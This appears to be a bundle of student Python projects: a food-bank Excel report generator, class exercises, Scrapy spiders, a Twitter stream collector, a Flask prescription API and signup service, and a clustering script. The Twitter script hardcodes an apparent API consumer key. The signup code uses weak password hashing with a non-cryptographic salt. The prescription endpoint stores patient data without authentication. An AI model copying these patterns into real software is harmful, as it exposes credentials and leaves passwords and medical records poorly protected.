end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
data = FBMInst.GetFoodDonations(start, end)
data[["Weight (lbs)"]] = data[["Weight (lbs)"]].astype("float")
return data
def PivotInventoryTable(df):
df[["Weight (lbs)"]] = df[["Weight (lbs)"]].astype("float")
df = pd.pivot_table(df, index=["DonorCategory"], values=["Weight (lbs)"], aggfunc=[np.sum])
return df
def MonthlyGuestData(FBMInst,month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
data = FBMInst.GetGuestData(start, end)
data[["Tracking Result"]] = data[["Tracking Result"]].astype("int")
return data
def WriteSummaryData(q, ws, origin=(1,1), month=None, year=None, existing_clients=None, inventory_adjust=0, donor_catagories=[]):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
donation_data = RunMonthlyReport(q, month=start.month, year=start.year)
user_data = MonthlyGuestData(q, month=start.month, year=start.year)
clients = set(user_data["Guest ID"].unique())
if existing_clients is None:
existing_clients = set()
new_clients = set([c for c in clients if c not in existing_clients])
ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 14
for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1):
ws.cell(row=cell_row, column=origin[1]).style = "Input"
ws.cell(row=origin[0], column=origin[1]).value = "{}".format(start.strftime("%B %Y"))
ws.cell(row=origin[0], column=origin[1]).style = "Headline 4"
ws.cell(row=origin[0], column=origin[1]).alignment = openpyxl.styles.Alignment(horizontal='center')
for i, item in enumerate(donor_catagories):
ws.cell(row=origin[0] + i + 1, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == item].sum()["Weight (lbs)"]
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "=SUM({}:{})".format(ws.cell(row=origin[0] + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories), column=origin[1]).coordinate)
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).style = "Calculation"
ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == "Waste"].sum()["Weight (lbs)"]
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "={}-{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).coordinate)
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).style = "Calculation"
ws.cell(row=origin[0] + len(donor_catagories) + 4, column=origin[1]).style = "Normal"
if (month, year) in FixedData.override.keys():
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = FixedData.override[(month, year)]["clients"]
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = FixedData.override[(month, year)]["new_clients"]
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = FixedData.override[(month, year)]["impact"]
else:
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = len(clients)
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = len(new_clients)
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = user_data["Tracking Result"].sum()
ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "={}*{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).coordinate, FixedData.output_weight)
ws.cell(row=origin[0] + len(donor_catagories) + 9, column=origin[1]).style = "Normal"
ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "=IF(ISTEXT({0:}), {2:}-{1:}, {2:}-{1:}+{0:})+({3:})".format(ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]-1).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).coordinate, inventory_adjust)
return existing_clients.union(new_clients)
def WriteSummaryLabel(ws, origin=(1,1), donor_catagories=[]):
ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 22
for i, item in enumerate(donor_catagories):
ws.cell(row=origin[0] + i + 1, column=origin[1]).value = "{} (lbs)".format(item)
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "Total Food Income (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = "Waste (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "Total Collected (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = "Number of Clients"
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = "New Clients"
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = "Total Impact"
ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "Food Distributed (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "Ending Inventory (lbs)"
for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1):
ws.cell(row=cell_row, column=origin[1]).style = "Headline 4"
def WriteExcelSheet(name, month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
q = FBM("mcfb.soxbox.co")
wb = openpyxl.Workbook()
ws = wb.active
ws.title = "12 Month Overview"
    # code borrowed from GenerateGraphs.py: figures out the inventory adjustment and the proper categories
if month is not None and year is not None:
x_end = datetime.datetime(year, month, 1)
else:
x_now = datetime.datetime.now()
x_end = datetime.datetime(x_now.year, x_now.month, 1)
x_end = x_end + relativedelta(months=+1)
x_start = x_end + relativedelta(months=-13)
food_data = q.GetFoodDonations(x_start, x_end)
guest_data = q.GetGuestData(x_start, x_end)
food_data[u'Donated On'] = pd.to_datetime(food_data[u'Donated On']).astype(datetime.datetime)
food_data[u'Weight (lbs)'] = food_data[u'Weight (lbs)'].astype(float)
guest_data[u'Outreach on'] = pd.to_datetime(guest_data[u'Outreach on']).astype(datetime.datetime)
guest_data[u'Tracking Result'] = guest_data[u'Tracking Result'].astype(int)
period_start = x_start
inventory = 0
inventory_adjust = 0
categories = set(["Grocery", "Org/Corp"])
for i in range(13):
period_end = period_start + relativedelta(months=+1)
food_month = food_data[(food_data[u'Donated On'] >= period_start) & (food_data[u'Donated On'] < period_end)]
guest_month = guest_data[(guest_data[u'Outreach on'] >= period_start) & (guest_data[u'Outreach on'] < period_end)]
month_clients = len(set(guest_month[u'Guest ID'].unique()))
if (period_start.month, period_start.year) in FixedData.override.keys():
month_clients = FixedData.override[(period_start.month, period_start.year)]['clients']
intake_total = food_month[food_month[u'DonorCategory'] != u'Waste'][u'Weight (lbs)'].sum()
waste_total = food_month[food_month[u'DonorCategory'] == u'Waste'][u'Weight (lbs)'].sum()
output_total = month_clients * FixedData.output_weight
food_out_total = waste_total + output_total
if i > 0 and (period_start.month, period_start.year) in FixedData.inventory.keys():
inventory_adjust = (FixedData.inventory[(period_start.month, period_start.year)] - (intake_total - food_out_total)) - inventory
#print("FixedData.inventory[({}, {})] = {}; intake_total = {}; waste_total = {}; output_total = {}; food_out_total = {}; month net food is {}; tallied inventory is {} => inventory_adjust = {}".format(period_start.month, period_start.year, FixedData.inventory[(period_start.month, period_start.year)], intake_total, waste_total, output_total, food_out_total, intake_total - food_out_total, inventory, inventory_adjust))
if i > 0:
inventory += (intake_total - (waste_total + output_total))
#print("intake={}, waste={}, output={}, delta={}, inventory={}".format(intake_total, waste_total, output_total, (intake_total - (waste_total + output_total)), inventory))
food_datums = RunMonthlyReport(q, month=period_start.month, year=period_start.year)
if not food_datums.empty:
messy_data = PivotInventoryTable(food_datums)
useful_data = messy_data.to_dict()[('sum', 'Weight (lbs)')]
            sorted_data = list(zip(*sorted(useful_data.items(), key=operator.itemgetter(1), reverse=True)))
categories = categories.union(sorted_data[0])
period_start = period_end
if u'Waste' in categories:
categories.remove(u'Waste')
WriteSummaryLabel(ws, origin=(2, 1), donor_catagories=categories)
ym_start = 12 * year + month - 1
clients = set()
adjusted = False
for i, ym in enumerate(range(ym_start - 11, ym_start + 1)):
y, m = divmod(ym, 12)
if not adjusted:
clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, inventory_adjust=inventory_adjust, donor_catagories=categories)
adjusted = True
else:
clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, donor_catagories=categories)
ws.merge_cells('B1:M1')
for col in ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M']:
ws['{}1'.format(col)].style = "Headline 1"
ws['B1'] = "12 Month Overview"
ws['B1'].alignment = openpyxl.styles.Alignment(horizontal='center')
ws['N1'] = "Last Year's Performance"
ws['N1'].style = "Headline 1"
WriteSummaryData(q, ws, origin=(2, 14), month=month, year=year-1, donor_catagories=categories)
ws.column_dimensions['N'].width = 30
ws['N{}'.format(8+len(categories))].style = "Normal"
ws['N{}'.format(8+len(categories))] = ""
ws['N{}'.format(12+len(categories))].style = "Normal"
ws['N{}'.format(12+len(categories))] = ""
ws.freeze_panes = "B3"
c1 = openpyxl.chart.LineChart()
c1.title = "Food Income (Lbs), Large sources"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A3:M4"))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "B22")
c1 = openpyxl.chart.LineChart()
c1.title = "Food Income (Lbs), All Other Sources"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A5:M{}".format(2+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "H22")
c1 = openpyxl.chart.LineChart()
c1.title = "Ending Inventory (lbs)"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(12+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "N22")
c1 = openpyxl.chart.LineChart()
c1.title = "Waste (lbs)"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(4+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "B37")
c1 = openpyxl.chart.LineChart()
c1.title = "Clients"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{1}".format(7+len(categories), 9+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "H37")
filename = "{}.xlsx".format(name)
wb.save(filename)
return filename
if __name__ == '__main__':
    pd.set_option('display.expand_frame_repr', False)
    if len(sys.argv) < 3:
        print("Run with \"<month number (1-12)> <Year (4 digit)>\"")
        sys.exit(1)
    print(WriteExcelSheet("out/Report {}-{}".format(sys.argv[1], sys.argv[2]), month=int(sys.argv[1]), year=int(sys.argv[2])))
``` |
{
"source": "2018-B-GR1-Python/Velasco-Yepez-Andres-David",
"score": 4
} |
#### File: Velasco-Yepez-Andres-David/01-Python/09_classes.py
```python
class Escuela:
# valor_categoria = 4
    __ciudad = 'Quito'  # private attribute
    pais = 'Ecuador'  # public attribute
def __init__(self, nombre, valor_categoria=4):
print(self)
print('Hola constructor')
self.nombre = nombre
self.valor_categoria = valor_categoria
def saludar(self):
print(f'Hola desde {self.nombre} localizada en'
f' {self.__ciudad} - {self.pais}')
def categoria(self):
return self.__calcular_categoria()
    def __calcular_categoria(self):  # private method
return self.valor_categoria * 3
def __str__(self):
return 'Escuela'
twa = Escuela('Theodoro Winword Anderson')
twa.valor_categoria = 2
twa.saludar()
print(twa.categoria())
class Auto:
_ensamblado = 'Quito'
numero_asientos = 5
def __init__(self, nombre, color):
self.nombre = nombre
self.color = color
def __init__(self, nombre, color, color_techo=''):
self.nombre = nombre
self.color = color
self.color_techo = color_techo
def cambiar_ensamblado(self, ensamblado):
self._ensamblado = ensamblado
def __maximo_numero_pasajeros(self):
return self.numero_asientos + 3
def __str__(self):
return (f"{self.nombre}\n"
f"{self.color}\n"
f"{self.color_techo}\n"
f"{self.numero_asientos}\n"
f"{self._ensamblado}\n"
f"{self.__maximo_numero_pasajeros()}\n")
bmw = Auto('Blanco', 'Version 1')
print(bmw)
class Hyundai(Auto):
def __init__(self, color, nombre):
super().__init__(color=color, nombre=nombre)
print('constructor')
print(self._ensamblado)
mi_carro = Hyundai('Negro', 'Santa fe')
print(mi_carro)
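# Illustrative extra check (not part of the original exercise): "private" names
# such as __ciudad and __calcular_categoria are only name-mangled, so they are
# still reachable through the _ClassName__attribute form.
print(twa._Escuela__ciudad)                # 'Quito'
print(twa._Escuela__calcular_categoria())  # same value returned by twa.categoria()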
```
#### File: python_01/spiders/intro_spider_01.py
```python
import scrapy
nombre_archivo = 'libros.csv'
def guardar_archivo(titulos, precios, stocks):
lista_stock = []
for stock in stocks:
if 'In stock' in stock:
lista_stock.append('1')
else:
lista_stock.append('0')
import csv
with open(nombre_archivo, 'w', newline='') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
data = list(zip(titulos, precios, lista_stock))
for row in data:
row = list(row)
spamwriter.writerow(row)
print("Listo :)")
class MiPrimerSpider(scrapy.Spider):
name = 'intro_spider'
def start_requests(self):
urls = [
'http://books.toscrape.com/catalogue/page-1.html',
'http://books.toscrape.com/catalogue/page-2.html',
'http://books.toscrape.com/catalogue/page-3.html',
]
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
titulos = response.css('article > h3 > a::text').extract()
precios = response.css('article > div > p:nth-child(1)::text').extract()
stocks = response.xpath(
"/html/body/div/div/div/div/section/div/ol/li/article/div/p[@class='instock availability']/text()")\
.extract()
guardar_archivo(titulos,precios,stocks)
```
#### File: python_04/python_04/items.py
```python
import scrapy
from scrapy.loader.processors import MapCompose
def shorten_amazon_link(link):
    id_producto = link.split('/')[-1]  # last element
short_link = 'https://www.amazon.com/dp/' + id_producto
return short_link
class ProductoItem(scrapy.Item):
titulo = scrapy.Field()
precio = scrapy.Field()
link = scrapy.Field(
input_processor=MapCompose(shorten_amazon_link)
)
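# Example of the input processor above, using a made-up product URL:
#   shorten_amazon_link("https://www.amazon.com/Some-Product-Name/dp/B01ABCD123")
#   returns "https://www.amazon.com/dp/B01ABCD123"
# so the item stores only the canonical /dp/<id> form of the link.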
```
#### File: python_04/spiders/input_processor.py
```python
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import MapCompose
from scrapy.loader.processors import TakeFirst
from python_04.items import ProductoItem
def truncar_texto(texto):
return texto[:50]
class DetallesProducto(scrapy.Spider):
name = 'novicompu'
start_urls = [
'https://www.novicompu.com/12-laptops'
]
def parse(self, response):
resultados_busqueda = response.css('div.product-container > div')
for producto in resultados_busqueda:
producto_loader = ItemLoader(
item=ProductoItem(),
selector=producto
)
producto_loader.default_input_processor = MapCompose(truncar_texto)
producto_loader.default_output_processor = TakeFirst()
titulo = producto_loader.add_css('titulo', 'h5 > a.product-name::text')
precio = producto_loader.add_css('precio', 'span.price.product-price::text')
link = producto_loader.add_css('link', 'h5 > a.product-name::attr(href)')
print(titulo, precio, link)
            yield producto_loader.load_item()  # like a return that does not stop the loop
```
#### File: Velasco-Yepez-Andres-David/Proyecto2BIM/get_tweets.py
```python
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
# API CREDENTIALS
ckey = "XTwJNYD8b9bekoIvJ4q5j1JUf"
csecret = "<KEY>"
atoken = "<KEY>"
asecret = "<KEY>"
class listener(StreamListener):
def on_data(self, data):
with open('tweets_mexico.json', 'a') as diccionario:
diccionario.write(data+",")
return True
def on_error(self, status):
print (status)
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, listener())
filters = [
'donaldtrump',
'trump',
'goverment',
'whitehouse',
'Trump'
]
# EEUU = -120.3,29.7,-87.8,46.3
# RUS = 37.28,52.72,91.07,66.19
# JAPON 131.46,30.57,146.57,44.94
# MEXICO -113.13,11.19,-88.91,31.74
twitterStream.filter(locations=[-113.13,11.19,-88.91,31.74], track=filters)
```
#### File: Velasco-Yepez-Andres-David/proyecto/crud.py
```python
import pandas as pd
url = 'http://catalogo.datosabiertos.gob.ec/api/action/datastore_search?resource_id=8513f446-1c94-426e-8592-d4cbdd295f33&limit=1000'
datos = pd.read_json(url, typ='frame')
datos =pd.DataFrame.from_dict(datos["result"]["records"]).set_index("_id")
def guardar_bdd():
global datos
datos.to_csv('./data/bdd_homicidios.csv', encoding='utf-8')
def consultar(columna, id=None):
global datos
#print(datos.loc[int(id),columna])
return datos.loc[int(id),columna] if id else datos[columna]
def modificar(columna,id,nuevo_valor):
global datos
if consultar(columna, id):
datos.at[int(id),columna] = nuevo_valor
guardar_bdd()
return True
else:
return False
def eliminar(index):
global datos
datos.drop(datos.index[int(index)-1], inplace=True)
guardar_bdd()
def insertar(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz):
global datos
homicidio=Homicidio(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz)
s = homicidio.get_list()
serie = pd.Series(s,index=datos.columns)
datos = datos.append(serie,ignore_index=True)
guardar_bdd()
class Homicidio:
def __init__(self,Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz):
self.Canton=Canton
self.Circuito=Circuito
self.Distrito=Distrito
self.Edad = Edad
self.Estado_civil=Estado_Civil
self.Fecha_infraccion=Fecha_infraccion
self.Hora_infraccion=Hora_infraccion
self.Nacionalidad=Nacionalidad
self.Provincia = Provincia
self.Sexo = Sexo
self.Zona = Zona
self.tipo = tipo_muert_matriz
def get_list(self):
return [self.Canton,self.Circuito,self.Distrito,self.Edad,self.Estado_civil,self.Fecha_infraccion,
self.Hora_infraccion,self.Nacionalidad,self.Provincia,self.Sexo,self.Zona,self.tipo]
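# Illustrative usage of the CRUD helpers above (column names come from the
# dataset's own headers; the ids and values shown are placeholders):
#   consultar("Provincia")          # whole column
#   consultar("Provincia", id=3)    # single cell
#   modificar("Edad", 3, "45")      # overwrite one cell and persist to CSV
#   eliminar(3)                     # drop a row and persist to CSV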
def menu():
print("Que desea hacer:")
print("1. Crear:")
print("2. Modificar")
print("3 Consultar")
print("4. Eliminar")
opcion = input("Opcion: ")
if opcion == "1":
Canton = input("Canton: ")
Circuito = input("Circuito: ")
Distrito = input("Distrito: ")
Edad = input("Edad: ")
Estado_civil = input("Estado civil: ")
Fecha_infraccion = input("Fecha infraccion: ")
Hora_infraccion = input("Hora infraccion: ")
Nacionalidad = input("Nacionalidad: ")
Provincia = input("Provincia: ")
Sexo = input("Sexo: ")
Zona = input("Zona: ")
Tipo = input("Tipo: ")
insertar(Canton, Circuito, Distrito, Edad, Estado_civil, Fecha_infraccion, Hora_infraccion, Nacionalidad,
Provincia, Sexo, Zona, Tipo)
if opcion == "2":
columna = input("Columna: ")
id = input("id: ")
nuevo_valor = input("nuevo_valor: ")
modificar(columna,id,nuevo_valor)
if opcion == "3":
columna = input("Columna: ")
id = input("id: ")
print(consultar(columna, id))
if opcion == "4":
id = input("id: ")
eliminar(id)
menu()
menu()
``` |
{
"source": "2018-BigBio-MedicalData-Hackathon/server",
"score": 3
} |
#### File: 2018-BigBio-MedicalData-Hackathon/server/agency.py
```python
from flask import Flask, request, jsonify, json
from flask_restful import reqparse, Api, Resource
import config
import dbconnect
import json
app = Flask(__name__)
api = Api(app)
# MySQL connection
cursor = dbconnect.cursor
conn = dbconnect.conn
# /Agency implementation
class Agency(Resource):
    # Save the prescription sent by the hospital to the server
def post(self):
try:
            # Receive the JSON data from the POST body and store it in variables
_content = request.get_json()
_insurance = _content['insurance']
_nursesign = _content['nursing_institution_sign']
_grantnum = _content['grant_number']
_patientname = _content['patient']['name']
_patientreginum = _content['patient']['registration_number']
_insname = _content["medical_Institutions"]["name"]
_insphonenum = _content["medical_Institutions"]["phone_number"]
_insfaxnum = _content["medical_Institutions"]["fax_number"]
_insemail = _content["medical_Institutions"]["email_address"]
_diseasecode1 = _content["disease_classification_codes"][0]
_diseasecode2 = _content["disease_classification_codes"][1]
_doctorname = _content["sign_of_prescription_medical_practitioner"]
_doctortype = _content["license_type"]
_doctornum = _content["license_number"]
_mediname = []
_medidose = []
_medidailydose = []
_meditotalday = []
_mediusage = []
_mediinside = []
for data in _content["prescription_medicine"]:
_mediname.append(data["name_of_medicines"])
_medidose.append(data["one_dose"])
_medidailydose.append(data["number_of_daily_doses"])
_meditotalday.append(data["total_dosing_days"])
_mediusage.append(data["usage"])
_mediinside.append(data["inside"])
_usepreiod = _content["injection_prescription"]["period_of_use"]
_dispensename = _content["injection_prescription"]["preparation"]["name_of_dispenser"]
_pharmacistname = _content["injection_prescription"]["preparation"]["pharmacist"]["name"]
_pharmacistseal = _content["injection_prescription"]["preparation"]["pharmacist"]["seal"]
_preparationamount = _content["injection_prescription"]["preparation_amount"]
_preparationyear = _content["injection_prescription"]["year_of_preparation"]
_changeprescription = _content["injection_prescription"]["change_of_prescription"]
_query = "INSERT INTO prescription(insurance, nurse_sign, grant_num, patient_name, patient_reginum, ins_name, ins_phonenum, ins_fax, ins_email, diseasecode_1, diseasecode_2, doctor_name, doctor_type, doctor_num, medi_name, medi_dose, medi_dailydose, medi_totalday, medi_usage, medi_inside, period_use, dispenser_name, pharmacist_name, pharmacist_seal, preparation_amount, year_preparation, change_prescription) values( %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s)"
print(_query)
_value = (_insurance ,_nursesign, _grantnum, _patientname ,_patientreginum ,_insname , _insphonenum , _insfaxnum , _insemail ,str(_diseasecode1) ,str(_diseasecode2),_doctorname , _doctortype , _doctornum ,str(_mediname) ,str(_medidose) ,str(_medidailydose) ,str(_meditotalday) , str(_mediusage) ,str(_mediinside) ,_usepreiod ,_dispensename ,_pharmacistname , _pharmacistseal , _preparationamount ,_preparationyear , _changeprescription )
print(_value)
cursor.execute(_query, _value)
_data = cursor.fetchall()
print(_data)
if not _data:
conn.commit()
return {"Register Success": 200}
else:
conn.rollback()
return {"Register Failed": 404}
except Exception as e:
return {'error': e}
def get(self):
try:
            # Query all stored prescriptions and build the response
_query = "select * from prescription"
cursor.execute(_query)
_data = cursor.fetchall()
result= []
for data in _data:
_insurance = data[1]
_nursesign = data[2]
_grantnum = data[3]
_patientname = data[4]
_patientreginum = data[5]
_insname = data[6]
_insphonenum = data[7]
_insfaxnum = data[8]
_insemail = data[9]
_diseasecode1 = data[10]
_diseasecode2 = data[11]
_doctorname = data[12]
_doctortype = data[13]
_doctornum = data[14]
_mediname = data[15]
_medidose = data[16]
_medidailydose = data[17]
_meditotalday = data[18]
_mediusage = data[19]
_mediinside = data[20]
_usepreiod = data[21]
_dispensename = data[22]
_pharmacistname = data[23]
_pharmacistseal = data[24]
_preparationamount = data[25]
_preparationyear = data[26]
_changeprescription = data[27]
tempjson= { "insurance":_insurance ,"nursesign": _nursesign,"grantnum": _grantnum , "patientname":_patientname ,"patientreginum" :_patientreginum ,"insname" : _insname ,"insphonenum": _insphonenum ,"insfaxnum": _insfaxnum , "insemail": _insemail ,"diseasecode1": _diseasecode1 ,"diseasecode2": _diseasecode2,"doctorname": _doctorname ,"doctortype": _doctortype ,"doctornum": _doctornum ,"mediname": _mediname ,"medidose": _medidose ,"medidailydose":_medidailydose ,"meditotalday" :_meditotalday , "mediusage":_mediusage ,"mediinside": _mediinside ,"usepreiod": _usepreiod ,"dispensename": _dispensename ,"pharmacistname": _pharmacistname , "pharmacistseal": _pharmacistseal ,"preparationamount": _preparationamount ,"preparationyear": _preparationyear , "changeprescription": _changeprescription }
result.append(tempjson)
# resultjson = json.dumps(result)
return result
except Exception as e:
            return {'error': str(e)}
```
#### File: 2018-BigBio-MedicalData-Hackathon/server/signup.py
```python
from flask import Flask, render_template, Response, request, session
from flask_restful import Resource, Api
from flask_restful import reqparse
import config
import random
import hashlib
import dbconnect
app = Flask(__name__)
api = Api(app)
# MySQL connection
cursor = dbconnect.cursor
conn = dbconnect.conn
# Generate a random salt
def salt():
alphabet = "0123456789abcdefghijklmnopqrstuvwxyz" + \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%()"
chars = []
for i in range(32):
chars.append(random.choice(alphabet))
return "".join(chars)
# Build the password hash from passwd + salt
def makepasswd(passwd, salt):
_data = str.encode(passwd + salt)
_hash = hashlib.sha256()
_hash.update(_data)
return _hash.hexdigest()
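# Sketch of how a later login check could reuse the helpers above: recompute the
# hash from the stored salt and compare it with the stored digest. This function
# is illustrative only and is not wired into any route.
def check_password(candidate_pw, stored_salt, stored_hash):
    return makepasswd(candidate_pw, stored_salt) == stored_hash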
class Signup(Resource):
def post(self):
try:
print(1)
            # Parse the sign-up form data received via POST into local variables
_parser = reqparse.RequestParser()
_parser.add_argument('user_id', type=str)
_parser.add_argument('user_pw', type=str)
_parser.add_argument('user_pwconfirm', type=str)
_parser.add_argument('username', type=str)
_parser.add_argument('user_reginum', type=str)
_parser.add_argument('phonenum', type=int)
_parser.add_argument('emailfirst', type=str)
_parser.add_argument('emailsecond', type=str)
_args = _parser.parse_args()
print(2)
            # Assign to variables
print(_args)
_userid = _args['user_id']
            _password = _args['user_pw']
            _passwordconfirm = _args['user_pwconfirm']
_username = _args['username']
_reginum = _args['user_reginum']
_phonenum = _args['phonenum']
_emailfirst = _args['emailfirst']
_emailsecond = _args['emailsecond']
_email = _emailfirst+ "@" + _emailsecond
_salt = salt()
_newpassword = makepasswd(_password, _salt)
print(3)
print(_email)
            # # Check for duplicate users
# _query = "select 1 from user where user_pw=%s" % (_password)
# cursor.execute(_query)
# _data = cursor.fetchall()
# print(_data)
# if _data:
# return {"duplicate": 401}
            # Password check
if _password != _passwordconfirm:
return {"not match password": 404}
            # Determine gender from the registration number
if _reginum[6] == "1" or _reginum[6] == "3":
_gender = "male"
elif _reginum[6] == "2" or _reginum[6] == "4":
_gender = "female"
else:
return {"Register number Not valid": 404}
_query = "INSERT INTO user(user_id, user_pw, salt, username, user_reginum, phonenum, email, gender) values(%s, %s, %s, %s, %s, %s, %s, %s)"
print(_query)
_value = (_userid, _newpassword, _salt, _username, _reginum, str(_phonenum), _email, _gender)
print(_value)
cursor.execute(_query, _value)
_data = cursor.fetchall()
print(_data)
if not _data:
conn.commit()
return {"Register Success": 200}
else:
conn.rollback()
return {"Register Failed": 404}
except Exception as e:
return {'error': "e"}
``` |
{
"source": "2018csb1082/Fair_Clustering",
"score": 3
} |
#### File: 2018csb1082/Fair_Clustering/Fair_Clustering.py
```python
import pandas as pd
import numpy as np
import math
import random
import time
import io
import random
import statistics
from itertools import combinations
# from google.colab import files
# uploaded = files.upload()
n=400
k=2
# creating data to be used
bank=pd.read_csv("D:/personel/codez/btp/trial/bank-original.csv",sep=";")
bank=bank.drop(['y','job','education','month','default','housing','loan','contact','day','pdays','previous','poutcome','campaign'],1)
bank=bank.drop(bank[bank['marital']=='divorced'].index)
gama=np.array(bank['marital'])
bank=bank.drop('marital',1)
raw_data=np.array(bank[0:n][:])
data = [list(raw_data[i]) for i in range(n)]
avg0 = avg1 = avg2 = 0
for i in range(n):
avg0 += data[i][0]
avg1 += data[i][1]
avg2 += data[i][2]
avg0 = avg0/n
avg1 = avg1/n
avg2 = avg2/n
col0 = [data[i][0] for i in range(n)]
col1 = [data[i][1] for i in range(n)]
col2 = [data[i][2] for i in range(n)]
var0 = math.sqrt(statistics.variance(col0))
var1 = math.sqrt(statistics.variance(col1))
var2 = math.sqrt(statistics.variance(col2))
for i in range(n):
data[i][0] = (data[i][0]-avg0)/var0
data[i][1] = (data[i][1]-avg1)/var1
data[i][2] = (data[i][2]-avg2)/var2
# print(len(data))
# print(data)
col1 = [data[i][0] for i in range(n)]
col2 = [data[i][1] for i in range(n)]
col3 = [data[i][2] for i in range(n)]
print(avg0,avg1,avg2)
print(max(col1),max(col2),max(col3))
print(min(col1),min(col2),min(col3))
# creating data to be used
data_group=[gama[i] for i in range(n)]
i=0
while (i<n):
if data_group[i] == 'married':
data_group[i] = 1
if data_group[i] == 'single':
data_group[i] = 0
i += 1
start=time.time()
print(len(data_group))
print(data_group)
# creating data to be used
distances = np.zeros((n, n))
avg_dist = i = count = 0
while i < n:
j = 0
while j < n:
# distances[i][j] = math.sqrt(((data[i][0]-data[j][0])*(data[i][0]-data[j][0]))+((data[i][1]-data[j][1])*(data[i][1]-data[j][1]))+((data[i][2]-data[j][2])*(data[i][2]-data[j][2])))
distances[i][j] = abs(((data[i][0]-data[j][0]))+((data[i][1]-data[j][1]))+((data[i][2]-data[j][2])))
avg_dist += distances[i][j]
count += 1
j += 1
i += 1
avg_dist = avg_dist/count
print(avg_dist)
# creating data to be used # not used anymore -- deprecated
# indices = [i for i in range(n)]
# comb = list(combinations(indices, k))
# random.shuffle(comb)
# for i in comb:
# print(i)
# defining cost function
def cost_function():
group_cost = [0,0]
count_g0 = count_g1 = 0
for i in range(n):
curr_group = data_group[i]
curr_center = assignment[i]
count_g0 = count_g0 + 1 if curr_group == 0 else count_g0
count_g1 = count_g1 + 1 if curr_group == 1 else count_g1
